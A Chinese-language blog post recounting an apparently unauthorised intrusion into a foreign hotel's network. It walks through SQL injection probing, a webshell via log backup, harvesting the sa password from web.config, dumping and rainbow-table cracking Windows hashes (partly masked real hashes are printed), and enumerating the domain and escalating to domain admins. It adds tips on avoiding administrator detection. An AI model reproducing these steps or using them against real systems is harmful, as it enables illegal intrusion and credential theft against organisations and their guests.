渗透国外某Hotel内网

00x00 网站初探
由于不是针对性的对目标进行渗透测试, 所以直接寻找网站的常见漏洞进行渗透. 首先了解一下网站的概况,查看网页链接,可以看出是asp.net写的,这里就可以猜测出服务器是windows+iis.
使用火狐的Live HTTP headers插件刷的一下就可以看出来了.
 

 

00x01 渗透实践
通过Sql注入获取webshell
这里漏洞修补了,方法是:
?id=1 AND 1 IN (select @@version)--返回
Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)

通过Log备份获得webshell
权限提升
先query user看看有在线的木有
 

如果有管理在线的话,要么赶紧找到提权突破口就闪,要么就先撤了等时机在上,
碰到细心的管理员netstat -an一下就可以很快的排查出xxip在连它,把日志一看就把你T飞了.
这里经过查看多个web.config（for一下）找到了数据库的sa明文密码,当然你可以通过sql injection获取数据库密码hash进行破解.
在别人的地盘用”自己”的东西是不是好点,一个sa就可以干很多事情了.
个人习惯,先上传gethash工具,
如: PwDump7 GetHashes都是很不错的选择,抓好丢机子里用彩虹表慢慢跑,前提免杀(这里tasklist、net start、netstat -an一下木杀毒)

Administrator:500:AAD3B435B514-xxoo-435B51404EE:4148523F64-xxoo-27962CFEBB8673:::
ACC***ER:1120:7630AC7F823B-xxoo-435B51404EE:67C86B3C2C0-xxoo-7EB68485FF298D0::: 
gr***ral:1135:C1812A18AB-xxoo-AD8EF711268D9:D80B352E1DF-xxoo-08BA668C67901B::: 
br***ez:3142:397B32F70C9-xxoo-85F02E9B6432A9:3C6DF2F32-xxoo-43EBF3DA543347B16::: 
C***nt:3143:42490206A91-xxoo-B435B51404EE:59F1886EEA9-xxoo-728AE1EFDF78EC89::: 
hm***o:3145:0C3F791CC-xxoo-D87772F:4E0AC2608807827-xxoo-21717D800:::

查看服务器基本信息
ipconfig /all
Windows IP Configuration
       
   Host Name . . . . . . . . . . . . : host1
   Primary Dns Suffix  . . . . . . . : A.COM
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : A.COM
       
Ethernet adapter Local Area Connection 2:
       
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2
   Physical Address. . . . . . . . . : 00-14-85-02-00-xx
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.100.205
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.202
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.201
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.195
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.103
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.13
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.65
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.1
   DNS Servers . . . . . . . . . . . : 192.168.100.201
                                       192.168.100.212
       
Ethernet adapter Local Area Connection:
       
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
   Physical Address. . . . . . . . . : 00-14-85-02-00-x2
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.100.84
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.83
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.81
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.80
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : 192.168.100.49
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.1
   DNS Servers . . . . . . . . . . . : 192.168.100.201
                                       192.168.100.212
   
从上面就可以看出 是内网并且存在域,不清楚可以用命令
net view /domain
Domain
-------------------------------------------------------------------------------
B           
A            
WORKGROUP            
The command completed successfully.
渗透A域中的机器
查看A域中都有哪些域成员.（IP直接ping下就知道,记录下TTL值,猜测系统版本）
 dsquery server -o rdn
(不清楚的可以nslookup A.com或者net group "domain controllers",这些命令在域环境下执行)
//查找当前域中所有的域控制器
HGhost            //192.168.100.212 TTL=128
host              //192.168.100.205 TTL=128 本机
HGhost2           //192.168.100.213 TTL=128
host1             //本机
可以看出本机为域控制器,那么得到domain admins权限就可以控制A域了,
这里经过测试发现domain users权限的用户可以添加domain admins组的用户,
直接net group "domain admins" xx /add就可以控制A域了（xx用户属于domain users跟administrators组,而administrators组加入了domain admins组 over）
这里不建议添加用户之类的.因为这样很容易被发现,导致权限丢失.之前抓的系统hash部分密码用彩虹表破解出来了,
我们用这些密码登录A域中的其他机器试试,这里以截图为目的.
先敲下命令 看哪些用户加入了domain admins和domain users组：
net group "domain users" /domain
Group name     Domain Users
Comment        All domain users
Members
-------------------------------------------------------------------------------
AC××××R
Administrator
br××××××z
......
The command completed successfully.
       
net group "domain admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
强势插入：
这里只有administrator一个域管理,密码没破出来,大家可以hash注入整整.用domain users组权限的用户登录终端看看
 

好了 运气不错 用户存在 另一台host看IP就知道也是本机了 这里A域下的机器就先到这里,下面看看怎么渗透其他域.

• ·渗透国外某Hotel内网
• ·渗透国外某Hotel内网